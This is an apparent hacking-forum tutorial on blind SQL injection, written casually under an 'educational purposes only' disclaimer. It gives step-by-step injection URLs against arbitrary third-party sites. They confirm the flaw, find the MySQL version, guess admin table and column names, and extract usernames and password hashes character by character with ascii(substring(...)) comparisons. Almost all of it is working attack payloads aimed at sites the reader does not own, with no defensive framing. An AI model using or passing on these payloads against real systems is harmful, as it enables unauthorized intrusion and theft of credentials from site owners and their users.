Blind sql Injection.

(ascii char)

For educational purposes only!

Hellow, HF users.
First of all what do you need.

A vulnerable only to blind sql injection webstite.

Notepad, to store data you collect while injecting.
And loads of loads of spare time.

Finding vulnerable sites: --Kobez expanding vulnerable collection guide!--

Checking vulnerability

Lets start, In what cases do we know if it really is a blind injectable site only?

Wel, you have a site. same as normal injection whit php?if= of pfp?f= of other stuff.. dous not mather.
we want to check if he is vulnerable. so we put and 1=1 behind the id number.
that is always true. ib this case we do not get an error,
now the real test: instead of 1=1 use and 1=2

Code:
www.[site].com/index.php?id=1+and+1=2

If we see any text missing or image movement.

or an error like this: invalid id or db_error select * from [site]@localhost call line... blah blah blah.
This means it is vulnerable.

do not forget: and 1=1 means true. page wil return unharmed.
and 1=2 is false. page returns in error or moved content.

Finding the mysql version of the site.

sinse it is blind sqli... the site will not pop up the version when you put version() no it needs more.
It always needs..
Using the substring(@@version,1,1) is asking if the =4 is true. so we ask database. hey database, is this a
version 4 you use.
Database is like No wtf i'm awesome. (he returns false.)
That means instead of =4 put =5

Code:
www.[site].com/index.php?id=1 and substring(@@version,1,1)=5
Database returns true. (page is normal)
this means its a version 5 database.

gambling columns and tables..

Yeeey people, we moved on to the fun stuff. guessing tables and columns.
since database only sais true or false. we gonna ask our little friend the database everything.

Blind sqli is not that hard. but it sucks as hell!!

how do we guess?
we put something like this: and (select 1 from users limit 0,1)=1
what did i do? wel.
I ask database hey do you in any case have a table name called USERS? database no im awesome. guess
again.
database returned false so we try again.

Code:
www.[site].com/index.php?id=1 and (select 1 from admin limit 0,1)=1
now i asked database if he has an admin column. database answers: yes im awesome. and returns true.
that means we have a hit yay.
If you are unluckly you need to guess more.

examples: members, tbl_admin, tbladmin, administrator, tbl_users, tblusers, admn

and way more.

God bless us because our journey is not yet on its end.

Columns. we need to guess them to :D

Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,password),1,1) from
administrator limit 0,1)=1
What did i do?
Wel i askt database hey, do you have a column password in table administrator?
database yes i have one.
he returned true.
we stil need usernames or what else they called it.

Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,username),1,1) from
administrator limit 0,1)=1

i ask database if he has a column username. database is like NO wtf!

He returned false. now i'm like thinking of killing me.

lets try again..

Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,name),1,1) from
administrator limit 0,1)=1

I asked database is he for example has Name as a column in table administrators.

database: yes. he returned true.

Hold on Hold on we are not finished yet.

get password and username using ascii char!

since that database hates us. he wont just popup the hash and username like that.
lets suck it out of him he made us mad allready.

by using the ascii char we can do this.

we know we have the column password and the column name. lets use this.
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password)
from admin where userid=2),1,1))>99
It returned true. we need to go higher.
but first what did i do?
i used the ascii char at start.
then i select name 0x3a password. as shown in my basic tut you should know by now.
and i selected these out of the table admin. i selected user 2 in the database.
Ok that should be clear.
We still need to go higher whit the ascii char.
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password)
from admin where userid=2),1,1))>101
it returned true again.
we need to go higher!
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password)
from admin where userid=2),1,1))>102
error.
this means its higher then 101 but not higher then 102 so we know its 102 yay.
the first character is 102 lets check this in an ancii char converter.
or use google and type ascii character 102.
i got letter f as my first character.
finding the next character.
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password)
from admin where userid=2),2,1))>99
look at the changes at the end of the link!!
i changed the 1,1 in 2,1
that means the database wil look for the second character in line.
have fun.
because you need to encrease this and look for the characters creating the full password, or hash, and
username.
this will take ages i wont type a full hash for ya XD

Good luck to all of you trying my tutorial.

Sorry for the bad english!
and i hope you injoyed my tutorial. grtz InQontroll!